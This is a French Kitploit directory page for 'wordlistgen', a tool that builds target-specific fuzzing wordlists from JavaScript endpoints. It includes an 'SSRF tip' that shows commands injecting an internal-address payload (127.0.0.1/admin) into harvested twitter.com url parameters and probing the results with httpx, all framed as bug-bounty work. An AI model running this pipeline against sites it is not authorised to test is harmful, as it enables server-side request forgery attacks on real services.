Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wordlistgen — Génère des listes de mots spécifiques à la cible pour le Fuzzing avec fuff | Kitploit
Outils/GitHubGitHub/ethicalhackingplayground/wordlistgen
Génération de PayloadsCollecte d'InformationsSécurité WebFuzzing
GitHubethicalhackingplayground/wordlistgen

wordlistgen

Génère des listes de mots spécifiques à la cible pour le Fuzzing avec fuff

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
1131346il y a 6 ansVérifié par Kitploit
Partager

wordlistgen

Génère des listes de mots spécifiques à une cible en recherchant des points de terminaison dans le javascript et ajoute des paramètres pour le Fuzzing avec d'autres outils

Version 1.0

Installation

$ go get -u github.com/ethicalhackingplayground/wordlistgen

$ go get github.com/003random/getJS

GitHub Logo

Générer la wordlist

$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "https://www.twitter.com"

GitHub Logo

L'utilisation de ffuf

Ensuite, faites preuve de créativité avec FFuF ou https://github.com/tomnomnom/qsreplace


CONSEIL SSRF 2 :

Générer la wordlist

$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -d <Un-Resolved> | tee wordlist

$ cat "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "www.twitter.com" | tee wordlist

root@kitploit:~
OUTPUT:

www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=FUZZ
www.twitter.com/v/latest/72x72//?url=FUZZ
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=FUZZ
www.twitter.com/articles/18311/?url=FUZZ
Vous pouvez aussi utiliser -dL pour charger une liste de sous-domaines comme :

$ cat <Resolved-Domains> | getJS -complete | ./wordlistgen -p params.txt -dL <Un-Resolved> | tee wordlist

Remplacer les variables par le payload

$ cat wordlist | qsreplace http://127.0.0.1/admin | tee -a hosts

root@kitploit:~
OUTPUT:

www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/v/latest/72x72//?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/articles/18311/?url=http%3A%2F%2F127.0.0.1%2Fadmin

Utiliser HTTPX pour suivre les codes et les titres

$ cat hosts | httpx -title -status-code

J'espère que vous obtiendrez une prime avec cette technique.


Si vous obtenez une prime, veuillez me soutenir en m'offrant un café


Offrez-moi un café
Télécharger l’outil